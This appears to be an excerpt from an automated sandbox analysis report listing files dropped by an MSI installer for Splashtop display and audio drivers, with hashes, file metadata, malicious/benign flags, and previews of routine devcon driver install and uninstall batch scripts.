                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:6:/Ajsd9KwqJ6dAGgOdRLvNMDPVgOdRLKE23PVgmBd9R7:kWZ9dAudE95d0E239Jd9R7
                                                                                                                                                                                                                                                                                                                                  MD5:A2DA78EF1F7BC59138D71F85D6310ECA
                                                                                                                                                                                                                                                                                                                                  SHA1:912DCBFF74495F0235A969BCE934B421086DD175
                                                                                                                                                                                                                                                                                                                                  SHA-256:A980C2CD38F4D2F06E6A5DC96BFFFB8EC39A7A1254D5FF6ED1E7F44048F66AE1
                                                                                                                                                                                                                                                                                                                                  SHA-512:32DAD786E55680F653F7F5570189E2C0F815CE0A69221B91743B67407587E9A13C414E5ECCEB2CD02A3C0A805E3D6D2639948DD22DFAC3B6FF56D74CC468AD56
                                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:echo off..cd %~dp0....REM uninstall...\..\..\..\SRUtility.exe -u...\..\utils\devcon64.exe remove *STVAD >> inst.log...\..\utils\devcon64.exe rescan >> inst.log...\..\utils\DIFxCmd64.exe /u stvad.inf >> inst.log..
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (native) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):53008
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.847750617309462
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:768:b9aXVnIo4e86mU2IpU88ukl7qqOky4QqSmOOgY3hs3BMBs3hsU4hJt34lz2:b9uV54e8Q6uoramO43hs3h3hsU4/tgy
                                                                                                                                                                                                                                                                                                                                  MD5:48A8D41400F7D4729A0FB3102B2FD7AF
                                                                                                                                                                                                                                                                                                                                  SHA1:709FCD8676F7E618B1D519D7C84422D90EAC81AD
                                                                                                                                                                                                                                                                                                                                  SHA-256:158BF7761E9A254E5D4608E62D11B86A682E505413C86128999F8EDC6294645D
                                                                                                                                                                                                                                                                                                                                  SHA-512:845DA37A4FC90DB0E4D1A0CE51E9436F3AB65289C4CAE189999A72DC516F09750FBE43D681746E5BD0C5E4E90C246BC58ADF95239A19A3E3E71000C0E8B46018
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32+ executable (native) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):59152
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.649199158440194
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:768:Qidu9HV92g74x9xMtsqRdUx2PEvp/MuTP3hs0KI3hsE5Et367SH:09HV92Z9fx/MYP3hs0t3hsE+tK7+
                                                                                                                                                                                                                                                                                                                                  MD5:FFC5D6FFD92E2F5DD7D454B5EA624825
                                                                                                                                                                                                                                                                                                                                  SHA1:22DC6D072A87B95A215735D8A9002757F1C99F4B
                                                                                                                                                                                                                                                                                                                                  SHA-256:BF3806D063FD4982791FA5F5C50DDC5B7F49B40615F6CFCE96016571CA4AF7CB
                                                                                                                                                                                                                                                                                                                                  SHA-512:653CAB148E0CE24DF36C1EC02760F19C9100542FCA5885B665E8F98EE82118B7930D3B9C8BAF18C1D08B5E1D3D5F7B3DDF0041581116BA5973CE30DFF4C4A958
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):286
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.868409179176479
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:6:fAjsd94wqJ6dA3OdqA3PMOdyE23PMmfPP0NIgm4OdELV5FaA37:EWH9dAedNtdyE23rH0GpBdM97
                                                                                                                                                                                                                                                                                                                                  MD5:A9A42F8DE6BBE12230621C01C8FD5987
                                                                                                                                                                                                                                                                                                                                  SHA1:360D7B9C960AA8BCFAB960F5BC8FE4C8217BFF1D
                                                                                                                                                                                                                                                                                                                                  SHA-256:377B50263A4EC36A0133666CCC089CC065119FE290FA53D9397D414BFDE6DDF3
                                                                                                                                                                                                                                                                                                                                  SHA-512:CFCBE219768697E54E62F27C0BC318590055BD70BBAB73262ED93B4F7B8A993D6984DB2CE1A0DABE65A2E83204FAE61AB4896BCA56385E49DA7527B4567EDDFD
                                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:rem echo off..cd %~dp0....REM uninstall...\..\..\SRUtility.exe -u...\utils\devcon.exe remove *STVSpkSimple >> inst.log...\utils\devcon.exe rescan >> inst.log...\utils\DIFxCmd.exe /u stvspk.inf >> inst.log....REM install...\utils\devcon.exe install stvspk.inf *STVSpkSimple >> inst.log..
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):290
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.94060950303714
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:6:/Ajsd94wqJ6dA3OdRLiA3PMOdRLKE23PMmBPP0NIgm4OdRL6V5FaA37:kWH9dAedDtd0E239H0GpBdm97
                                                                                                                                                                                                                                                                                                                                  MD5:9DC29B6F9CC69C534977BFCDC98E2705
                                                                                                                                                                                                                                                                                                                                  SHA1:4AA931BE2C7297A93CEC4172F48EDDD8DBC4E3AB
                                                                                                                                                                                                                                                                                                                                  SHA-256:78CEDF996370DF8A59521A77BDDB7118610924A02625AA53BFE47975A23B3B8D
                                                                                                                                                                                                                                                                                                                                  SHA-512:5227EFC53C6D12C012691A920ADB77B51E9E939294B7B690774BDC16EFAC877D9D92C409D5197244279F4BE8052CA8FA9FCD37D82178807DABA8D0F528F179A7
                                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:echo off..cd %~dp0....REM uninstall...\..\..\SRUtility.exe -u...\utils\devcon64.exe remove *STVSpkSimple >> inst.log...\utils\devcon64.exe rescan >> inst.log...\utils\DIFxCmd64.exe /u stvspk.inf >> inst.log....REM install...\utils\devcon64.exe install stvspk.inf *STVSpkSimple >> inst.log..
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):18559
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):7.313796375225627
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:384:5eNwo6RK7Nm4UN1d08JN77hhOd5wTRK7Nm4UhkX88JN77hhOmT:Yw1n33hsd5wFIXf3hsmT
                                                                                                                                                                                                                                                                                                                                  MD5:3BEB01DAE131D8E2F595EA697676FD82
                                                                                                                                                                                                                                                                                                                                  SHA1:E4AE36B125E40E3964C176FAD1A2690317574A15
                                                                                                                                                                                                                                                                                                                                  SHA-256:B2E42C84B27299C6973FC976FF22837D156788A6D423286816DD9B551A959245
                                                                                                                                                                                                                                                                                                                                  SHA-512:DDCEB2EE00865574863F4E6D5CE32A4363FCBC85C42B75AE348FA1A09E1FC5284355A772E127372993560CA634B52447EE6F4CF7261691EB8EEDD0DD95731FEC
                                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:Windows setup INFormation
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):4530
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.531167619033096
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:96:TMuJlJjPHHXkP9bYxHJswZ4xNzp49RY8MMCuqx:TMuFDHX4yR4xNdezqx
                                                                                                                                                                                                                                                                                                                                  MD5:C6F9A3971989361505A22B26F16CBF33
                                                                                                                                                                                                                                                                                                                                  SHA1:228877B73EF10A0AF73693FB2B4F49FD6DA74049
                                                                                                                                                                                                                                                                                                                                  SHA-256:1D08A49A629D67FDC77E6EC38B90F10A2C7788BDE9EDE15075732DA010FCE8DB
                                                                                                                                                                                                                                                                                                                                  SHA-512:B49317454756DD29317838224D2B49A1D4CDB358B0BAE5EFBD6CD7F12CDEE018BF9F3A8D7D1484D64BA158821E3EBDC52D18BD601D999FFB9127A744BD477A3C
                                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:[Version]..Signature = "$CHICAGO$"..Class = MEDIA..Provider = %ST%..ClassGUID = {4d36e96c-e325-11ce-bfc1-08002be10318}..DriverVer=08/26/2021,1.0.1.0..CatalogFile = stvspk.cat....[SourceDisksNames.x86]..222 = "STVSpk Driver Disk","",222,\32bits....[SourceDisksNames.amd64]..222 = "STVSpk Driver Disk","",222,\64bits....[SourceDisksFiles]..stvspk.sys = 222....;;This syntax is only recognized on Windows XP and above- it is needed to install 64-bit drivers on..;;Windows Server 2003 Service Pack 1 and above.....[Manufacturer]..%MfgName% = SplashtopDS, NTAMD64, NTx86....;; For Windows Server 2003 Service Pack 1 and above, a 64-bit OS will not install a driver..;; unless the Manufacturer and Models Sections explicitly show it is a driver for that platform..;; But the individual model section decorations (or lack thereof) work as they always have...;; All of the model sections referred to are undecorated or NT-decorated, hence work on all platforms....[SplashtopDS]..%STVSpk.DeviceDesc%=STVSp
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):202
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.8854882526314825
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:6:/Ajsd94wqJ6dA3OdqA3PMOdyE23PMmfPP07:kWH9dAedNtdyE23rH07
                                                                                                                                                                                                                                                                                                                                  MD5:3535AC984A69ED2E778B7F2B77618C94
                                                                                                                                                                                                                                                                                                                                  SHA1:3B6B19524DFAABDA5CF5FD2DD476A0108C928676
                                                                                                                                                                                                                                                                                                                                  SHA-256:98040E1CF91AB05E0341BAE64F1D8AD29077A5351C586F2507CFF4C41CA80A1C
                                                                                                                                                                                                                                                                                                                                  SHA-512:FD92393595D39F6260BB517DF38E82FBAB7BD7A9A79C276DEAFBDC69B123359F3D20C5A5B28AB06EFCB412E64E2AC940FA84FB130EAE9ACC778410119E7BF083
                                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:echo off..cd %~dp0....REM uninstall...\..\..\SRUtility.exe -u...\utils\devcon.exe remove *STVSpkSimple >> inst.log...\utils\devcon.exe rescan >> inst.log...\utils\DIFxCmd.exe /u stvspk.inf >> inst.log..
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):208
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.961978816753448
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:6:/Ajsd94wqJ6dA3OdRLiA3PMOdRLKE23PMmBPP07:kWH9dAedDtd0E239H07
                                                                                                                                                                                                                                                                                                                                  MD5:754E73406288B7E24396DE0B02C9767D
                                                                                                                                                                                                                                                                                                                                  SHA1:EE115F24C025725D5BC56DAF460CBB25084D1059
                                                                                                                                                                                                                                                                                                                                  SHA-256:A2B082F8CF5944558CA68BEEC0290C49A3E4080E3B364A9A64F6CC203DFD2339
                                                                                                                                                                                                                                                                                                                                  SHA-512:9C378936BE40F532C0866713417DC0F686F8067EE706AD96DC71BA9614378A9ACF1E481C95E25C0AA0C9E63CC23C237FAAB22E49BD773E138543F27C7F0AEA5E
                                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:echo off..cd %~dp0....REM uninstall...\..\..\SRUtility.exe -u...\utils\devcon64.exe remove *STVSpkSimple >> inst.log...\utils\devcon64.exe rescan >> inst.log...\utils\DIFxCmd64.exe /u stvspk.inf >> inst.log..
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):9728
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.7653420469834185
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:192:F+0YcUgZN/zSbTyB9Bs+VC+k5JEdVMNuE:F+oUgZN/zSbTysOC+k5MVs
                                                                                                                                                                                                                                                                                                                                  MD5:1EF7574BC4D8B6034935D99AD884F15B
                                                                                                                                                                                                                                                                                                                                  SHA1:110709AB33F893737F4B0567F9495AC60C37667C
                                                                                                                                                                                                                                                                                                                                  SHA-256:0814AAD232C96A4661081E570CF1D9C5F09A8572CFD8E9B5D3EAD0FA0F5CA271
                                                                                                                                                                                                                                                                                                                                  SHA-512:947C306A3A1EEC7FCE29EAA9B8D4B5E00FD0918FE9D7A25E262D621FB3EE829D5F4829949E766A660E990D1AC14F87E13E5DBD5F7C8252AE9B2DC82E2762FB73
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):10752
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.547294400796419
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:192:yg/LSSz/NZS+cI818WJ6TPPeqj6wnzX/bHz3coD:yg/LSSz/NZSBITOg6+D/X
                                                                                                                                                                                                                                                                                                                                  MD5:F512536173E386121B3EBD22AAC41A4E
                                                                                                                                                                                                                                                                                                                                  SHA1:74AE133215345BEAEBB7A95F969F34A40DDA922A
                                                                                                                                                                                                                                                                                                                                  SHA-256:A993872AD05F33CB49543C00DFCA036B32957D2BD09AAA9DAFE33B934B7A3E4A
                                                                                                                                                                                                                                                                                                                                  SHA-512:1EFA432EF2D61A6F7E7FC3606C5C982F1B95EABC4912EA622D533D540DDCA1A340F8A5F4652AF62A9EFC112CA82D4334E74DECF6DDBC88B0BD191060C08A63B9
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):77824
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.995224286140262
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:768:3zrhT5+KybRpnE8K74kca7NerB8iXpYmRRXvdi82BSOe9oKSJ2SLD0BEZWkA:3+KY04RMmSCYmBiF4O7WT
                                                                                                                                                                                                                                                                                                                                  MD5:B40FE65431B18A52E6452279B88954AF
                                                                                                                                                                                                                                                                                                                                  SHA1:C25DE80F00014E129FF290BF84DDF25A23FDFC30
                                                                                                                                                                                                                                                                                                                                  SHA-256:800E396BE60133B5AB7881872A73936E24CBEBD7A7953CEE1479F077FFCF745E
                                                                                                                                                                                                                                                                                                                                  SHA-512:E58CF187FD71E6F1F5CF7EAC347A2682E77BC9A88A64E79A59E1A480CAC20B46AD8D0F947DD2CB2840A2E0BB6D3C754F8F26FCF2D55B550EEA4F5D7E57A4D91D
                                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):81920
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.977706172799676
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:1536:MP2K0pa0WfEYp9Y/XQhpgnbP212YCJpDhiF4O7W:MePOYe4bu1epDh8RW
                                                                                                                                                                                                                                                                                                                                  MD5:3904D0698962E09DA946046020CBCB17
                                                                                                                                                                                                                                                                                                                                  SHA1:EDAE098E7E8452CA6C125CF6362DDA3F4D78F0AE
                                                                                                                                                                                                                                                                                                                                  SHA-256:A51E25ACC489948B31B1384E1DC29518D19B421D6BC0CED90587128899275289
                                                                                                                                                                                                                                                                                                                                  SHA-512:C24AB680981D8D6DB042B52B7B5C5E92078DF83650CAD798874FC09CE8C8A25462E1B69340083F4BCAD20D67068668ABCFA8097E549CFA5AD4F1EE6A235D6EEA
                                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32+ executable (DLL) (native) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):25040
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.182836790970066
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:384:RnmRA8diIqFr2hrkzbBglwb20HsOANRBUBR+uekbnYPLGKw:5183HrkXBhb2CI7BUBUnCtKw
                                                                                                                                                                                                                                                                                                                                  MD5:3C0B8DA5253B68665362881787681D04
                                                                                                                                                                                                                                                                                                                                  SHA1:8C2925071EBBB1D94B34DBC9B926CC96F3D6674F
                                                                                                                                                                                                                                                                                                                                  SHA-256:8DB1AF7E90197353FD346A2A4D60C7EACD506EBD593A9BCA811DC9C5D420E141
                                                                                                                                                                                                                                                                                                                                  SHA-512:5ED6163BD09A81D50059B816B3D188DDABA7F032C091CD21205F081CA1B4BB902129A5AA87ADF55B5910B193721226F2E82CC53D9A0DF0D833933F798FCF5471
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32+ executable (native) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):12008
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.164676951334965
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:192:C1XYhWsmdZunYe+PjPGr9ZCApkT1rrZgjldrXa+v5lPr9/6onc:CBYhWsmdknYPL/p1P6j7rtc
                                                                                                                                                                                                                                                                                                                                  MD5:1A2D1119C830079A91FDB0BC96C68E9F
                                                                                                                                                                                                                                                                                                                                  SHA1:6DFD2D9E82F5ABF807402E81F837DEA3FBF24861
                                                                                                                                                                                                                                                                                                                                  SHA-256:758732573D0360444173A9ADFEBC41E6295262A2E128F4A7DA973138BD05E1A6
                                                                                                                                                                                                                                                                                                                                  SHA-512:B8A8F0D970D4ACA797C3AE4F70C32D1068599F1FD802430F75606541F00BCC133B66484DAB0276115E09E39126AC398D54933A7757E4C28EC54FC0E40B869A3C
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32+ executable (DLL) (native) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):18384
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.784225074424451
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:384:KNpdeIDggm1TgXu0HM9CZFuz9ynYPLGKsH:Kp0f1Tg+CM9COZytKU
                                                                                                                                                                                                                                                                                                                                  MD5:FFF61014618EB5B63F5CBB7457537577
                                                                                                                                                                                                                                                                                                                                  SHA1:E899E392E493F731B900B36FF3C6AD384D35B129
                                                                                                                                                                                                                                                                                                                                  SHA-256:764FFF366A21B3D44F3F43BDED347E8BF6ACAEC3F911AEA07555A3D8E26CB407
                                                                                                                                                                                                                                                                                                                                  SHA-512:E057FC69EBE9E36A8D4DABD23044229450FA606564F28A566233AB014C7433ED515AC0BAE8427E667164518A92F74803719A1DB0066AF17560423C8E6BB6FA9B
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32+ executable (native) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):12008
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.1656019250857135
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:192:C1XVhWcj2sFnYe+PjPGr9ZCApkT1rrZgjldrXa+v5lPr9SPp94v:CBVhWcj2onYPL/p1P6j7rLv
                                                                                                                                                                                                                                                                                                                                  MD5:8A12125138A8F34F9700529363947D5E
                                                                                                                                                                                                                                                                                                                                  SHA1:996729B5B9A1E85F3B911911AF675C51549F6D13
                                                                                                                                                                                                                                                                                                                                  SHA-256:392811F93E8DC4BD0BAEEF0DEDC6879DB667EAC0BE894BC6FBCF5BBB776AC98F
                                                                                                                                                                                                                                                                                                                                  SHA-512:E7AE1C133B9660B791373F1D3BD6765207E6FC1D132687CCE99E267E4945CB9843A47FE53FF0C2A2F20C704F50A8F129514F56675B52FB2C354FC1D829EA62D9
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):51
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.239902792442837
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:3:Eyd/MLVLV5rxk6BzX:EydELVLrqM7
                                                                                                                                                                                                                                                                                                                                  MD5:F03B61C1BE8851BF64E2EB97D4A3AF85
                                                                                                                                                                                                                                                                                                                                  SHA1:FE502F4ECD1209B3DADA7AC8F4876ED9FB5264E8
                                                                                                                                                                                                                                                                                                                                  SHA-256:AF5EFC928B43A1A476BEAFC055B19568EBCEE29EF4CEB211353DD218689F833B
                                                                                                                                                                                                                                                                                                                                  SHA-512:D229E472C0FAC83B5B952D368444DDCAC0DB965D033F29AC9EAB8F55D256BC4BFAB0861F21045A6E3B809F5B76AC30917AF321B3DC5F901F982CF477578ABD34
                                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:utils\devcon.exe install stvideo.inf STVideo_Driver
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):77
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.625480821115634
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:3:EydKiRgLV5rxk6BzJzIvXYRABAC:EydOLrqMqPYRkAC
                                                                                                                                                                                                                                                                                                                                  MD5:70271842A0F3305F9A2922EFE95FBED0
                                                                                                                                                                                                                                                                                                                                  SHA1:8B60A48D3F3CE9BF397B586F88087A291DBE3B89
                                                                                                                                                                                                                                                                                                                                  SHA-256:A537CF622B5DBAD19587CBC8FE08BBCE8BFE7E49497BECA5784723E876F99415
                                                                                                                                                                                                                                                                                                                                  SHA-512:B84A1FE296A36346C9658F1A715114FE5A7518FC1E9B9C7A4D08DDFED760ED15626FCD1751EE361CE2D91FA9B19B75873BAA6ED1BB441BB5170DB50473FC2CD0
                                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:utils\devcon install stvideo.inf STVideo_Driver_WIN7..utils\Mirror2Extend.exe
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):79
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.7040270721314865
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:3:EydRFMyEJLV5rxk6BzJzIvXYRABAC:EydRFYJLrqMqPYRkAC
                                                                                                                                                                                                                                                                                                                                  MD5:C8D6ACDAF26E7B8FDAF2888E0CAE6275
                                                                                                                                                                                                                                                                                                                                  SHA1:B46AF328CF18FA3687AE4D9EE06780C21A12B7D9
                                                                                                                                                                                                                                                                                                                                  SHA-256:DE19F496F5932135FB25AB04EEE9E5A923728DDFBE13499058530239D890240D
                                                                                                                                                                                                                                                                                                                                  SHA-512:79CF0BEDCB07C72B6FFF243F7B6D90116AF1E558290E873863C5BE6994ECB6A7E4D4A0ED33CB05D0AC3699CD2328B3E4613868DECB77D7B0BBA6CF49AD809067
                                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:utils\devcon64 install stvideo.inf STVideo_Driver_WIN7..utils\Mirror2Extend.exe
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (native) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):20944
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.364902287777804
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:192:NpXpb9ygWK86AclLjQ/WzRf8aMKnqPndtQrcaceJe0uqmnYe+PjPGyz/wa4/h:59yD6nlLoWB8a5Od+zcuebZnYPLGK5a
                                                                                                                                                                                                                                                                                                                                  MD5:FD3381A69042E1B01266549549845449
                                                                                                                                                                                                                                                                                                                                  SHA1:C6D8D4BF754DA24C0C9B39DFF0B336120BF3829A
                                                                                                                                                                                                                                                                                                                                  SHA-256:86688C2EAFB525E2E0E6723907E15567E426670C6B9934E129218A45F47B117A
                                                                                                                                                                                                                                                                                                                                  SHA-512:E9CEBA750A44248860A5980475D41358C0E0B78EF65BF823995572AA091804D3AF836A2A456A8C4A394AE57AF2B8589DFBF561D1007A3A600136A0746EFFB479
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
